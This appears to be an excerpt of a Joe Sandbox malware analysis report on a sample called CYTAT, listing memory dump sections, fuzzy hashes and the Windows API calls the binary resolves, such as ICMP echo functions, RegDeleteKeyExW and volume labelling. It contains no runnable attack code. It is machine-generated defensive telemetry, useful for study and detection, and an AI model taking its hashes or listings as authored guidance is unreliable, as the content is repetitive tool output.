                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 3375834691-2298589950
                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: $<
                                                • API String ID: 4104443479-428540627
                                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: \VH
                                                • API String ID: 2507767853-234962358
                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: \VH
                                                • API String ID: 2507767853-234962358
                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                • String ID: crts
                                                • API String ID: 943502515-3724388283
                                                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$LabelVolume
                                                • String ID: \VH
                                                • API String ID: 2006950084-234962358
                                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetMenuItemInfoW.USER32 ref: 00449727
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                • DrawMenuBar.USER32 ref: 00449761
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$InfoItem$Draw_malloc
                                                • String ID: 0
                                                • API String ID: 772068139-4108050209
                                                • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcscpy
                                                • String ID: 3, 3, 8, 1
                                                • API String ID: 3469035223-357260408
                                                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                • API String ID: 2574300362-3530519716
                                                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                • API String ID: 2574300362-275556492
                                                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                • API String ID: 2574300362-58917771
                                                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
